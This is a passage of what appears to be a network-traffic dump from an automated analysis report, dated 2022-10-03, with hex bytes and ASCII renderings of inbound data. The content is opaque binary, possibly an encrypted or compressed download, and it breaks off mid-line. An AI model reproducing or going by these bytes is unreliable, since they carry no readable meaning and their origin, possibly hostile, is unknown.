2e 45 59 Data Ascii: sa92u4>aYKILKg8["%9~EmTR=bo#if35{&~z*AQ{HSw)Hwtf!\|"h\Cvc00>RJi1zGv&R8q~0/>K5J@+1QN(2Tl,^l$q}P.EY
2022-10-03 14:13:31 UTC	100	IN	Data Raw: 14 70 a8 0f cd 8a 97 d4 62 75 82 d3 25 4f 2a 09 e0 9f 3d e3 38 fd 07 09 fe b4 3c 63 e7 2b 1f 44 02 ef c0 86 d5 bd 40 97 4a bc 6e 3b ac d2 28 45 6b 16 bc 73 6e ef e8 0b 9d 47 3b de 80 db 68 53 8c a0 b1 58 d1 c9 ac 66 15 f7 96 8a 9e 3f f7 46 35 35 17 c9 0d 82 76 38 69 f4 a4 4b 2f c3 eb 92 6a c5 4f 34 42 67 ba 48 da cf 4e 52 ad 66 c1 60 d2 52 6e 17 39 0f 4e 0b 19 68 bf 23 e6 6e ac d5 44 ce 38 0e 3f b1 30 ce f4 16 67 79 01 1b 9b 8e 41 ba 08 77 3a af 65 ec 94 8f bf d1 5d 95 df 7b d1 7f 32 69 4e 1a 53 e6 b7 31 57 bf fb 66 1a 18 62 f9 ef 94 57 19 98 dc f5 76 40 50 62 c2 44 95 6f 32 7a 4e aa 69 16 e3 ca c0 5b 7f 19 58 69 bc a2 e6 98 16 f0 0f 1e 32 90 42 8d e0 41 c1 ff 81 e8 83 fa 2a e5 02 19 5a fb 1d 5e c1 6a 5d d7 e1 5a 3f ae 4f 8e 1b 6b 81 3a 49 a0 82 69 e9 fa Data Ascii: pbu%O=8<c+D@Jn;(EksnG;hSXf?F55v8iK/jO4BgHNRf`Rn9Nh#nD8?0gyAw:e]{2iNS1WfbWv@PbDo2zNi[Xi2BAZ^j]Z?Ok:Ii
2022-10-03 14:13:31 UTC	101	IN	Data Raw: c6 a4 39 1a 96 10 a0 a6 06 37 b3 e2 14 1a 98 68 05 22 61 14 81 59 9e 85 8e 72 24 ef 20 46 52 7b 19 2b 70 35 52 b5 b3 f4 96 6b bf 2c 39 50 1d 04 a0 30 75 e3 d5 c5 39 80 63 c4 6b fb b8 c7 b1 1f 76 23 56 19 df 3e 73 dc b2 26 7b 83 a3 af 10 80 b0 83 68 39 4f 26 df 94 a3 97 a3 05 a6 69 67 ce 0c 57 da fd b1 31 d1 d4 82 bc e5 00 a8 22 22 ff 86 00 40 6b 87 62 d3 67 5a 7b 71 91 00 45 9f 4d 55 45 3f 78 bf 7c 5d 0a b6 ee 87 1d 4d e1 04 0a be 2e b4 cf cf 07 60 15 f1 7a 2b c0 08 be ce a2 46 06 cc 7a 58 7e bd bc 59 c3 8c 30 b2 43 35 96 29 65 6a 2f 18 d9 c8 51 1e 3d 60 5d a2 c3 13 90 d5 fe 96 e4 f7 17 4e de 0d e6 e2 cc 28 82 7c f9 92 36 ef 85 a2 ab e4 c6 d7 16 dd cd d7 60 4b 4f fc ad 64 bd ca 20 80 66 80 1f 04 76 45 77 be e4 32 35 46 24 ce 63 79 2b 39 b4 28 34 f5 c1 17 Data Ascii: 97h"aYr$ FR{+p5Rk,9P0u9ckv#V>s&{h9O&igW1""@kbgZ{qEMUE?x\|]M.`z+FzX~Y0C5)ej/Q=`]N(\|6`KOd fvEw25F$cy+9(4
2022-10-03 14:13:31 UTC	103	IN	Data Raw: 78 ef 14 6b 7d 85 bc bd 4d 45 50 20 38 4a de 35 ff c4 e2 14 0d 0e 9c ac 62 dc b0 82 5a 06 95 44 79 05 31 ff 32 af fd 9c 31 22 20 e3 7a 0a b8 8b 54 f4 76 7c b0 3a 50 56 1c c8 93 18 cf 65 7b a7 da b5 a0 2c 3a dc b6 95 8f 39 fd 91 0b f0 b4 00 66 71 3a 09 51 26 31 3e aa d6 aa cf 8c 4d b2 57 32 26 3d 2e 76 5d 1d 39 4b 40 11 8b e5 9c 37 6c fe 00 d1 42 4d 12 99 a5 77 e4 e9 0a 67 15 f7 e8 9b 99 31 d6 43 ae 1c 12 d7 35 9d 23 b5 7f eb 45 73 1c b5 5f 34 69 da 73 03 11 fa ab 45 ed 4c 55 30 37 5f f5 7f ee 47 08 92 3b 0f 51 27 01 14 dd 33 cd 7a 94 c8 4c f4 28 09 26 85 35 a9 6f 07 71 61 5a fa f5 3e 5a ba 3f 7f 27 8f f3 f0 8f 83 fa ce 3e 0e d1 75 30 3d 01 07 c3 0d 45 fc 69 3d 20 3c e0 72 02 5d 6c 91 6c 8f ae 07 f2 d6 88 ee 79 ee 79 85 5d 8c e8 21 7d 5b db e2 73 7f db d8 Data Ascii: xk}MEP 8J5bZDy121" zTv\|:PVe{,:9fq:Q&1>MW2&=.v]9K@7lBMwg1C5#Es_4isELU07_G;Q'3zL(&5oqaZ>Z?'>u0=Ei= <r]llyy]!}[s
2022-10-03 14:13:31 UTC	104	IN	Data Raw: af cd 17 90 00 8b f1 dc a2 5a 80 e4 d1 af 79 10 ed 50 54 89 73 84 92 27 fe 36 30 58 1a bc 0d 3e cb 83 91 d5 d2 2f 6e 3e 6d b8 50 9d 29 96 f8 59 f6 ac 99 b4 5f f9 d4 2e cc 11 98 7e b4 2f 12 b6 f5 17 bc d3 7e df 37 7a 2f bb 72 86 9e 55 63 2f d2 fa 4f 02 6a 8d 23 61 38 45 6f 27 95 08 7a c8 3a ef 43 6a 14 ad 21 76 d2 37 d4 19 0e d4 d2 aa dc 69 4a 35 1e 76 22 a2 1f c9 3e 74 58 07 28 ce 66 b0 bc 14 b4 bd a1 65 2a 56 dd c3 91 b2 93 3d d9 98 ec 7f df 00 6e 27 ed b4 2a d2 33 7b 42 e5 0a bb f2 22 fd 83 26 23 b3 19 4f d4 fb 5b 6a 7f 81 16 5c 80 d1 52 3f 69 77 2b a2 61 1d af fc 82 3b 2e c8 7f 02 af 22 88 ba 35 05 6a 3b d5 f7 2c ca 02 ae d3 bd 81 1d d4 7c da ac af 8d f0 bf 92 1d 8e 61 1d 61 22 76 6f 16 29 cd e0 a2 c2 3d 60 60 2f 85 0f 90 d4 ed 9e f5 ff 07 30 96 0c f6 Data Ascii: ZyPTs'60X>/n>mP)Y_.~/~7z/rUc/Oj#a8Eo'z:Cj!v7iJ5v">tX(feV=n'3{B"&#O[j\R?iw+a;."5j;,\|aa"vo)=``/0
2022-10-03 14:13:31 UTC	105	IN	Data Raw: 71 f0 2a 1a 61 46 14 2a 6c d9 de 87 03 c6 2b 75 9e f8 2c 63 07 7b e1 bf 36 76 c9 84 a2 0a 26 a8 a9 e1 6d b7 90 60 c8 3f 85 95 72 10 d7 4e b7 27 a4 76 bc a4 3a 92 72 05 6a 6f 85 ab 3d 4d 4f 8e b0 01 77 c0 1c d5 4c 8d df 0c 92 87 81 74 dc a6 1e 4b 00 9a 6f 6f 99 20 c8 2d ce 96 00 32 00 3f ce 5b 99 88 8d 54 47 65 7b af e6 70 a9 0d de 80 8c e6 77 66 88 cc 29 a0 23 38 12 97 39 86 28 fa 17 05 d4 37 2f 63 e5 2b 1f 46 0b 1f 3f ab fa ad 45 8e 4c b2 6b 37 b2 2c 38 61 76 2c 47 4a 6c 1d 06 f2 86 16 2e de 80 d1 5d 5f 9d 80 a2 79 da d0 74 66 39 fe 65 8d 88 31 f6 c9 28 1e 1d c8 1c 8a 61 d7 6f c0 59 52 10 d3 c3 34 66 da 40 e2 71 4a b0 53 f5 6b 55 0a 37 51 f8 73 da 58 75 06 35 18 b0 1b 32 7b 50 24 dd b3 b9 d1 73 79 2a 06 39 ab 22 c5 0d 17 5a 75 04 68 ab a2 4b bc 33 39 21 Data Ascii: qaFl+u,c{6v&m`?rN'v:rjo=MOwLtKoo -2?[TGe{pwf)#89(7/c+F?ELk7,8av,GJl.]_ytf9e1(aoYR4f@qJSkU7QsXu52{P$sy*9"ZuhK39!
2022-10-03 14:13:31 UTC	106	IN	Data Raw: 26 d6 f3 fa 0d a7 ae c3 01 b5 9a 9b 02 b4 eb 33 78 e4 55 57 39 e0 cf 56 22 c6 f5 39 d4 9b 28 e4 25 3f 7e 56 3b a2 99 c6 d7 14 e5 22 93 80 c0 4e f6 fb b2 f6 ec 3c ed 87 91 13 87 74 fb b3 56 97 e6 59 0e 4e f4 71 56 49 a1 c9 95 9e 2f ec 87 20 f6 05 94 f4 3e 57 8f 9c f9 3b 23 62 2a e2 b2 43 33 4d 9e 76 ee 5a 6e 8b 1a 50 ee 0e 39 86 9a 06 61 fc b2 07 ae fd 20 ae 62 77 1a 6c f7 3a a9 50 81 f2 cc 74 3d cf 3f 78 8f 61 06 20 6f 3f ce b3 ac f8 89 09 59 2b 26 5d 7a 99 a6 2f 69 c3 08 c5 1c 80 ff c3 6f c4 a0 e1 2b 18 69 33 91 ff df 2f 71 4a b6 2f 05 6a c5 33 1c 80 fd 90 e1 3b 58 49 4e 93 bc 8e b0 9f 88 dc 73 ee e1 7f 29 fc 2d 3d c3 b2 7b 0f e5 0a bb b8 35 e6 84 37 a4 f5 81 7b d3 ca f8 7b 71 90 8f 4b 91 5d 63 8b 78 79 bf e4 f9 04 a7 e5 ea a9 bc ff 1e 20 41 28 a0 e7 ab Data Ascii: &3xUW9V"9(%?~V;"N<tVYNqVI/ >W;#b*C3MvZnP9a bwl:Pt=?xa o?Y+&]z/io+i3/qJ/j3;XINs)-={57{{qK]cxy A(
2022-10-03 14:13:31 UTC	108	IN	Data Raw: 59 b9 d5 55 96 14 2a f9 f6 42 80 b2 cd 85 b5 14 87 72 5d 73 19 2e 23 1c 5e 63 a9 b5 46 39 c9 b6 30 44 c7 95 85 6f 22 33 fc 7f e0 0d 1e 93 0c 17 f1 db 95 a8 7b ec f7 3d 01 ff 53 c9 0a 3c 53 c1 8c 25 e7 76 5b 8f ff fc 78 09 c9 51 7c 32 7c d9 84 fb 0c 26 a4 b5 d8 14 a0 46 75 a3 11 80 84 71 3e 1a 83 ae 0f 83 7d a0 50 13 42 62 14 69 4a 6c 98 3d 4b 6d 6d bd 29 47 d2 1a c2 57 e9 14 1c 99 92 a6 83 f7 8a 37 5a 06 8c 7e 67 03 08 3c 29 83 ed 28 e5 21 3f c8 4c a2 c5 8b 54 6e 4f 88 ae 14 7a 81 db c9 93 82 b1 23 65 88 ca 36 bf 38 2e ec 87 1e 92 c7 fc 21 1c f1 b8 38 6e fe 20 0e 5f 1f 0a 3f ab fa b8 5b b5 8a a9 64 22 92 11 28 69 63 2a 23 58 45 0d 04 ff 9b 39 52 c1 90 2f 43 61 84 99 aa 7f 04 da 82 78 04 e4 7f 8a 8f 25 f6 ab 33 21 16 d0 1e 89 76 38 65 f4 a4 4b 2f d1 c1 0d Data Ascii: YUBr]s.#^cF90Do"3{=S<S%v[xQ\|2\|&Fuq>}PBbiJl=Kmm)GW7Z~g<)(!?LTnOz#e68.!8n _?[d"(ic#XE9R/Cax%3!v8eK/
2022-10-03 14:13:31 UTC	109	IN	Data Raw: 5e 3f 55 c8 ef e1 a3 29 b3 32 eb 21 a8 48 e3 aa 50 26 21 eb 34 1c 37 82 02 2b c5 73 9b fa cf c6 da 97 7c f8 62 af 21 12 05 8d 9b e7 db 86 01 3f 70 f0 df d3 b0 20 58 4e bb 80 b1 84 d5 2a a4 97 9d f8 a3 a8 84 61 e9 5f 31 83 1c ce 70 06 c0 fc 11 16 86 d6 e3 05 2c 51 47 15 30 9b fd d2 02 99 a7 91 80 f1 25 5a f9 57 fc ca 3c c8 06 94 05 e8 4c cb b3 5c f9 40 5d 18 5b cf fc 54 76 4a 64 95 98 37 a8 92 32 c0 bc 9e e3 e4 d8 9d 96 d4 e8 35 73 2e 6f b0 4f 7c 2b 9f 76 e4 a9 c4 92 3a e2 c8 1f 34 0d 4a 09 73 a5 23 10 a7 d3 fa 1a 98 68 05 22 78 3a a3 51 89 55 43 67 31 ca 0b 0e 02 63 31 e0 71 35 54 9d c8 f6 96 61 d6 3b 2b 46 4f 62 a1 30 6d f0 db d4 18 91 67 d3 1f 7e be c7 bd 71 da 21 b1 13 f9 3e 75 c7 b4 26 7b c0 a3 af 10 f0 43 b2 60 31 7e 58 d4 84 ad b5 9a 03 8e c9 74 c8 Data Ascii: ^?U)2!HP&!47+s\|b!?p XN*a_1p,QG0%ZW<L\@][TvJd725s.oO\|+v:4Js#h"x:QUCg1c1q5Ta;+FOb0mg~q!>u&{C`1~Xt
2022-10-03 14:13:31 UTC	110	IN	Data Raw: 89 c4 4b 38 7d a2 a2 2a 2f 15 a7 ac ec 8d 5f ec 28 3a 9d 6c 27 cf a5 d5 77 15 d1 82 2c a6 3e 55 94 65 38 92 87 b8 10 16 af 76 8d 0c 67 46 86 29 0c 65 2d 25 d2 46 99 cd 43 68 04 09 ef bf a6 83 9e b0 8a d4 48 8d 72 48 70 17 20 0b 92 2e 6a 91 dc 91 0c 37 a9 31 55 b7 d9 95 64 39 3b 71 cf ce 1d 05 85 21 a2 47 d9 93 cd 16 5e f5 3b 14 f9 56 54 79 9f 5a de 8d f3 55 58 44 94 f1 ed ff 72 e1 7b be 3c 54 6c ae 38 02 2f ba 35 83 db a2 46 79 e4 9d 83 84 7d 28 0f 06 d6 bd 90 76 b6 86 a1 6c 73 0f 44 d6 af 9c 37 44 5f c6 0b 46 94 c1 1c d5 39 be 15 0d 96 92 90 6e f9 a6 0f 44 1e a8 91 6e b5 35 f1 3c 8a e9 7b 70 24 3f ca 53 9b b1 1d e3 f9 09 e4 b0 37 63 a6 1c d9 9c 9b d2 9c 65 a4 fd 2b b2 58 94 ee 96 1f 91 53 8e bf 18 f7 a1 19 c3 ef 2b 04 5f 10 09 19 d9 6e a8 53 97 62 1e 66 Data Ascii: K8}*/_(:l'w,>Ue8vgF)e-%FChHrHp .j71Ud9;q!G^;VTyZUXDr{<Tl8/5Fy}(vlsD7D_F9nDn5<{p$?S7ce+XS+_nSbf
2022-10-03 14:13:31 UTC	111	IN	Data Raw: 42 ee 0c d7 c1 99 3a ec 75 56 cd 91 50 6c df 55 e6 c0 90 e7 96 bd ed 62 2e 1e 4c f3 07 46 d8 68 55 c9 0e 54 0c e6 89 e4 37 78 83 5e 0c b2 85 6d fb 79 93 3d a4 3d 39 55 c8 c3 ab a1 22 9b e8 e5 3e 8a ba f3 82 4d 33 3e 9e bf 55 32 88 6d 98 e2 60 9e dc cf cd d4 da 94 96 fb 95 23 1a 69 30 93 89 06 24 0a 54 b1 f5 c9 ba 76 90 5a 44 de 52 06 86 df 06 9d 25 8e fc bf c5 4a 2d e8 55 5a 5c a6 cc 7a 2a f9 42 3b dd 8d fe 5e 0b 3d 5f 3b c1 20 9e ea c8 5e e5 1d 90 91 f4 55 ce 05 56 da e5 15 df eb 6e ec 98 c0 d9 bc 56 87 e3 44 e6 50 c5 e3 52 25 ce 64 95 9a 16 6b 7c c7 29 b1 87 fb 3e da 86 9a fc 3d 22 4e 35 7c cf 17 12 9e 9a 05 5f c4 68 9a 44 5d ec 0e 33 32 2b 18 7e be 38 41 1f 1f e1 cd 7b 4f 16 2b 6b 2d b9 46 a9 71 51 5e 55 c7 5b 09 12 67 1d 23 61 31 84 3a ef f4 96 69 ed Data Ascii: B:uVPlUb.LFhUT7x^my==9U">M3>U2m`#i0$TvZDR%J-UZ\z*B;^=_; ^UVnVDPR%dk\|)>="N5\|_hD]32+~8A{O+k-FqQ^U[g#a1:i
2022-10-03 14:13:31 UTC	113	IN	Data Raw: 8a 62 c5 0d c3 ee 8f be fa 73 25 00 13 c0 f0 c2 78 c6 59 f3 b2 53 50 c3 1d 97 72 ec dd c1 76 41 05 ad f7 3a 2b 2c b9 3b 62 73 09 9f b0 3c 16 18 83 6b aa 46 37 89 d9 a6 36 51 ba 95 ca 09 eb a6 9f ce a6 62 14 c6 ca 9d 7e ca c1 89 e5 7a 71 b4 7d 2d 8e 6c e6 ed 2b 33 8a e9 b8 13 16 af 76 bc d1 16 f4 8e 3f 46 59 91 27 d2 53 be 9e 25 95 ea f9 ef a9 4b 8d b2 d6 87 b0 1e 72 73 60 6b 17 22 ca 91 f0 6a 91 df 91 30 36 a9 31 44 c4 8a 8e 77 32 3d 13 71 d3 51 f1 95 08 9d f7 d9 90 b4 8f ef f7 31 00 9a 33 70 08 2d 52 f6 34 d9 e6 50 6c 2a fa fa 63 1b 3c a9 bf 36 7a ac 1d 3a 08 2c dc 16 f2 69 aa 6e c5 ce 2e 8b 86 0c 6c 17 90 a1 7c 2a 74 bc a4 3a d4 71 05 66 4a 16 9e 3d 47 2a 81 bd 29 4b de 51 cc 4b e2 05 02 8d 93 55 7c da 87 17 5a 08 83 7e 66 0f 3f f5 47 59 87 23 20 25 3f Data Ascii: bs%xYSPrvA:+,;bs<kF76Qb~zq}-l+3v?FY'S%Krs`k"j061Dw2=qQ13p-R4Plc<6z:,in.l\|t:qfJ=G*)KQKU\|Z~f?GY# %?
2022-10-03 14:13:31 UTC	113	IN	Data Raw: d2 81 63 c3 63 c1 bd c0 3b b7 76 23 b0 08 d3 28 fd 7f b0 30 15 5d 59 af 1a 95 c7 46 60 3b 52 5e 5e 17 a3 9d a8 2b 78 c3 67 c4 2e df 29 fc bb 54 11 a6 5b bb 69 88 bb 24 32 ea 9b 2a cc 38 86 64 c0 e3 4c 7d a7 1f 48 4d 8e 47 41 3c f4 d0 bf 78 fe 0a b2 fd 1f 9c ba e0 05 28 54 28 a0 ed 1f f3 60 13 ec e0 a0 42 08 bf dc 82 a1 0e da 67 fc 1d bd bc 52 70 94 10 06 57 1d 6b 47 ab 61 3e 18 b0 b5 a9 1c 39 61 c6 86 c4 13 91 c5 e4 99 79 56 01 30 97 24 1d e6 6e 33 a2 9e ed ba cb f9 09 2a ba e2 d3 d7 1a df cd db 5f 7a 4a fc a7 6e ac c5 b5 e7 bd 96 93 c6 fa c7 76 1c f4 29 2d 43 00 11 73 79 21 22 a1 35 1e 09 47 06 51 91 68 96 ee bf 56 9f aa 9a d3 3b 1d a0 3f 6e 9e 50 ed 28 39 aa a7 d9 ce 83 e3 f9 ec 9f 83 2d 8a bb e4 96 6f 1a 17 ed cb a8 07 a4 6a 29 39 65 46 8d 2c 4b 49 a6 Data Ascii: cc;v#(0]YF`;R^^+xg.)T[i$28dL}HMGA<x(T(`BgRpWkGa>9ayV0$n3_zJnv)-Csy!"5GQhV;?nP(9-oj)9eF,KI
2022-10-03 14:13:31 UTC	115	IN	Data Raw: c7 ba 18 d9 9e 93 08 71 69 99 c1 38 a3 15 b0 11 69 ea 9e 3f ea db 09 f1 ba 37 61 fc 15 68 b4 eb ee f9 a3 d7 aa 53 9f 31 e1 65 24 be 2f ad f8 72 7d 43 4b 40 11 15 f7 e8 99 5b de 8a c8 28 3e 3c 8a a2 62 fa 7a 88 67 1f df c0 88 9e 24 f9 3a e2 0c 15 ce 7e 33 74 29 64 92 ef 48 03 d1 eb 93 6c c5 43 34 cd 64 ba 48 e1 78 5c 43 a4 5d e1 73 c2 73 0a 0c 29 7b ff 18 1e 7b 5e 2e a0 16 18 d5 6c 62 11 bd 3b ba 20 cc e3 0e ae 0d a2 e7 9a a8 63 0e 22 3e 32 87 db e3 88 96 a0 be 9c 93 c0 74 a8 6d 10 60 5d 1f 53 ed 43 f5 d7 ba 9e a5 1c 18 75 8d 41 9c a9 12 ca 7c e6 72 62 c1 d0 c0 42 f0 76 4b 37 45 93 f9 65 5b c8 df 5a 44 a4 5a 78 b1 90 a3 9b 3a ec 67 d8 cd 91 52 55 f0 56 fe 16 92 f8 98 b5 02 70 33 95 58 e2 0d 2a 70 79 5a c3 01 31 60 15 75 e5 11 43 32 27 40 b9 ad dd fa fd 08 Data Ascii: qi8i?7ahS1e$/r}CK@[(><bzg$:~3t)dHlC4dHx\C]ss){{^.lb; c">2tm`]SCuA\|rbBvK7Ee[ZDZx:gRUVp3X*pyZ1`uC2'@
2022-10-03 14:13:31 UTC	116	IN	Data Raw: 0f 15 1e 88 30 64 bf 2e 06 a5 1c 1f 1e 66 7e 0e 24 6c 27 48 58 b2 8d 7b 70 09 66 22 3d 42 66 19 2f 73 ba 09 b5 b3 f6 ed 3d c4 2d 3d 54 fd 2f a0 30 67 f0 e5 c6 1c 6b 63 c5 70 cb be c7 a6 08 65 27 89 cc df 2f 71 d6 a1 34 0b 7e 5c ae 36 99 fb 9a 7f 37 4b 4d d2 84 a7 83 57 02 a2 cb 6f d9 d0 73 36 f5 a2 3f dc b6 5f a7 1b 0b 97 21 18 a1 89 3b b3 69 96 60 d8 14 5c 57 74 98 19 50 9d 41 43 2a 7c 64 41 79 d3 1e 95 d7 8d 26 be e0 15 04 b8 d6 a1 cb 34 1d 73 17 e6 e6 28 d9 f6 be f1 a4 41 0c a1 3f d5 bd b9 32 ef 6c 91 22 b5 53 1d 70 2c 7a 6a c0 1f e1 e8 ae 09 0e 00 55 24 d7 17 90 c5 e9 81 fc 01 00 1c 9e 04 ef d7 62 26 80 7b e9 ba d0 ea 9e 56 bb ce f3 fd 97 8d cc d1 73 ce d2 93 a4 64 ae c8 35 e7 79 96 93 ca 19 fa 74 1c ff 2c 61 3a f3 c6 9d 65 32 2c b2 2d 18 16 3d 16 71 Data Ascii: 0d.f~$l'HX{pf"=Bf/s=-=T/0gkcpe'/q4~\67KMWos6?_!;i`\WtPAC*\|dAy&4s(A?2l"Sp,zjU$b&{Vsd5yt,a:e2,-=q
2022-10-03 14:13:31 UTC	117	IN	Data Raw: 77 06 44 a4 af 9c 37 3e d6 51 bc 23 5e c5 0a cc 42 f3 10 62 55 8f ab 77 99 22 1f 4b 0b 3d 7c 6a b2 01 fe 3c 87 84 c8 22 25 35 a1 93 88 b8 81 45 6e b7 4a af 14 71 81 08 c8 93 8e f6 62 65 88 c6 ff a2 2d 34 ea 87 10 bd e0 23 01 0b f3 87 36 61 e9 44 6f 4e 14 1b 1d a8 d0 c5 99 9f 4a a7 72 3e ac 43 c8 68 69 3b 91 86 41 11 1d dc d2 2a 59 d8 a8 2d 43 4d 88 e7 ef 68 d2 c3 81 65 13 98 be 88 9e 24 fb 4f 24 62 f4 c9 0d 84 5e e4 6f ec 50 62 4a d9 c3 23 46 39 48 1c 76 09 f7 42 f2 7d 47 50 ad 21 38 62 d2 52 7b 02 30 1f 21 fb 1f 71 47 34 e2 a9 ab d7 66 64 3e 26 e3 be 2a db 9c d8 76 7e 10 dc 2d a3 4b bd 08 e5 3c af 69 ec 81 b4 64 d5 4c 94 af bc 2f 7e 14 4e 53 15 6a 3e 29 22 55 88 c2 75 1d 12 7e fc f6 f1 63 1a b4 c3 fb 4a 72 ff 09 23 43 fa 72 18 b7 45 93 f7 3e aa c8 df 56 Data Ascii: wD7>Q#^BbUw"K=\|j<"%5EnJqbe-4#6aDoNJr>Chi;AY-CMhe$O$b^oPbJ#F9HvB}GP!8bR{0!qG4fd>&v~-K<idL/~NSj>)"Uu~cJr#CrE>V
2022-10-03 14:13:31 UTC	119	IN	Data Raw: de 12 91 02 82 e5 34 b2 7a 9e fd 5b 11 c0 e5 f0 43 5b 81 74 90 88 d1 71 ad 3b c1 be 91 f4 2f ce 96 8f 27 c2 0f 60 01 7b 8c 14 ec 61 61 71 81 a1 68 90 30 c2 ee 0e 22 2a 99 1a 41 b4 2e 01 b4 e3 1e 23 66 e7 b2 27 e5 8b 60 4e 44 98 86 ff 13 c5 20 47 18 65 1e 29 fe 82 7a 61 b2 f4 9c 68 d3 2a 3b de d0 06 2e 87 4f 1a d5 c5 16 87 69 1b 60 ee 97 f1 b7 1e 7c 2f a5 13 f7 18 71 d6 ba ee 14 73 88 af 1b 8f ef b0 60 3b 58 49 ff b8 a3 8d 8c 03 8e c2 74 fe 04 7f 11 fc b1 3b d4 a6 5b ac f3 06 90 0e 33 f1 8a d6 b6 45 8f 17 14 e8 5d 71 7a 89 1f 4d 86 52 bd 3a 54 7b a7 74 ff 13 a8 04 92 19 b8 f7 08 00 a7 31 5e e6 1b 07 4b 11 cd 23 2b c2 67 6b dd aa 5d 24 c9 5d d6 bd 84 bc 58 61 94 39 a6 46 0b 6d 03 4e 60 36 06 33 e1 84 15 3f 15 9c 2e c4 19 9b cd e1 9e fd e8 ff 31 ba 0e fe ea Data Ascii: 4z[C[tq;/'`{aaqh0"A.#f'`ND Ge)zah;.Oi`\|/qs`;XIt;[3E]qzMR:T{t1^K#+gk]$]Xa9FmN`63?.1
2022-10-03 14:13:31 UTC	120	IN	Data Raw: 55 2a 3c e4 54 d6 22 b1 58 de 8d cf ce 9e 47 9e fe ec e4 06 53 79 bf 22 68 cb 84 a4 08 26 a8 8b e1 69 a0 4c 60 c7 3f 84 ac d1 21 16 9a 8d f3 93 76 ba c1 44 6e 73 0f 7d 6e d9 90 3d 4d 5e 41 b7 5d 41 c1 1c c4 6c 08 15 0d 94 9e a6 69 26 22 1e 4b 00 a2 7b 6f 99 2a d0 78 81 eb 06 39 a8 38 ce 5a 8b ab a8 45 4b 71 6a a2 3c 61 a9 1c c2 31 95 fd 75 1a e4 cd 29 b5 89 34 cf 8e 0a 97 b5 7f 0d 1a f6 09 20 53 fe 09 1f 6c 00 05 d8 27 85 aa 53 9c 59 89 75 00 ac 3b b5 78 4d 2a ae d7 51 35 0f e2 07 39 7d c9 a8 73 42 4d 84 ae b3 4c c4 59 a6 6c 04 d5 62 10 b6 3f e1 55 38 1e 18 d9 29 95 e6 05 4c fd 78 5d 99 f3 d2 25 6e cf 99 10 70 66 a1 6a e6 77 4a 58 83 ed f2 60 d8 2c 68 0e 2a 13 ce 76 1f 71 45 5c a6 64 aa d3 66 b5 e6 0b 39 ba 23 c9 db d5 75 7e 1c f2 17 a5 4b bd 21 2d 1b be Data Ascii: U<T"XGSy"h&iL`?!vDns}n=M^A]Ali&"K{ox98ZEKqj<a1u)4 Sl'SYu;xMQ59}sBMLYlb?U8)Lx]%npfjwJX`,hvqE\df9#u~K!-
2022-10-03 14:13:31 UTC	121	IN	Data Raw: 11 46 d4 2a 11 95 fc 1b 9d 6f 8d fc b3 65 20 43 fd 41 4a 07 82 ce 7a 2a f9 52 39 dd 8d fe 00 08 3d 53 47 0b 33 bb c4 01 16 f6 18 aa 66 05 b5 09 25 59 e4 c9 d3 db 39 91 13 9c 96 ab b3 56 9c 30 2c 01 50 e9 eb 43 4d 90 76 84 84 07 39 83 38 d0 85 68 f5 3e cd e6 c8 d9 c3 29 4a cf 7f b4 5f 7c 84 9f 76 e8 d5 7e 81 2c 87 f1 0f 39 1c 8a 75 84 b5 2e 0b dc fd 1f 32 62 7f 6a de 6a 3c bc 36 81 8e 50 74 35 aa da 47 13 6d 76 34 71 35 54 a3 dc 0e 97 6b cf 42 18 51 67 03 b3 27 76 f8 fd 63 1c 80 69 ed 8c ca bf c1 d8 48 76 23 bb 08 c8 3e 67 b9 af 31 14 73 b4 c0 e0 9e ef ba 0f 24 59 49 d4 82 cc 67 a8 03 84 ac 46 cf 06 79 01 16 b0 3b da b4 4e ac f6 1b ae 50 3f f9 92 33 d8 73 86 64 c2 f9 45 6a 62 81 0b 22 91 44 43 3d 6e 16 45 79 ff 11 d1 e5 92 35 bc f8 6b fa ae 28 aa 88 16 04 Data Ascii: Foe CAJzR9=SG3f%Y9V0,PCMv98h>)J_\|v~,9u.2bjj<6Pt5Gmv4q5TkBQg'vciHv#>g1s$YIgFy;NP?3sdEjb"DC=nEy5k(
2022-10-03 14:13:31 UTC	122	IN	Data Raw: b9 c9 53 42 eb 07 dc 8a 49 96 a3 d2 06 18 38 ac 73 4c 78 19 0f ce 0a 72 7b 86 c1 9d 38 37 85 27 46 dc 84 9f 4c d2 39 02 78 e4 e1 0e 94 22 f9 22 d9 93 cd 51 ac f6 3b 18 ef 65 d1 1d 2d 49 c9 98 c3 18 5b 68 94 f1 c3 31 ff ac 86 a1 2f 6f c8 ac 29 1f 39 87 5d f1 45 ac 57 63 cf 41 c4 85 77 27 09 b6 b6 18 92 67 ab b1 0e 90 72 29 78 73 bc e2 51 4c 45 54 ad 3a 65 d6 1d df 42 f1 18 12 8f 9e bc 7d e7 b1 01 50 ff 8b 43 4c 88 32 97 32 82 eb 06 36 4a c5 cf 5a 80 d7 94 55 68 61 63 c0 ee 71 a9 16 a7 b2 85 de 64 77 99 d3 35 a2 3c 25 fd 81 0e 71 38 d1 04 64 c3 ab 31 7a e0 37 1d 59 14 00 d6 b5 c1 54 52 b1 5a bc 60 0c 5f 2c 29 63 53 ed 44 b4 bf 0e 0f e7 8c 28 48 c9 9f ce bc 4c a2 ab b3 65 bd d6 8b 67 13 e1 1b 70 9f 2e eb 3a 2d 0c 15 ce 15 ed 8c 28 6e e6 35 6b 02 db c5 36 60 Data Ascii: SBI8sLxr{87'FL9x""Q;e-I[h1/o)9]EWcAw'gr)xsQLET:eB}PCL226JZUhacqdw5<%q8d1z7YTRZ`_,)cSD(HLegp.:-(n5k6`
2022-10-03 14:13:31 UTC	124	IN	Data Raw: 38 43 36 dd c5 b0 3a 90 f9 ed 39 50 45 de ac 6a 20 1c 67 83 66 ed 8a 6d 8d ef 85 90 dc d8 d4 35 92 40 89 d5 86 fc 1a 6a 2b b3 fc e1 a6 10 85 61 f4 c9 b3 04 21 49 3a e0 2c b3 8e d5 0f c6 a7 8d fc bf cc 09 f4 e9 55 5e 28 71 10 78 20 db f4 31 f5 f1 d4 e5 0f 52 4e 56 10 2b b2 d8 df 3c 81 10 90 86 94 b9 f6 fb 5d da cb 25 da 1f fe 18 86 f9 c0 ab 8c f9 e0 5e 18 5b e3 ef 56 31 5e 67 95 94 02 2a 83 3e a5 49 95 f4 34 a4 69 87 d9 c9 08 2e 22 56 41 5d 13 98 f1 6d ec c6 62 bc 38 c3 d3 06 11 d1 9f 1a 78 db eb 01 b3 e8 32 02 6c 76 38 4b fb 3d b6 53 93 8d 56 1d 64 c7 20 4c 1b 71 10 44 7c 34 52 bf bb fd 81 bd cd 42 32 51 67 0f a9 ea 70 39 ba c9 1d 80 69 aa 91 c9 bf cd b0 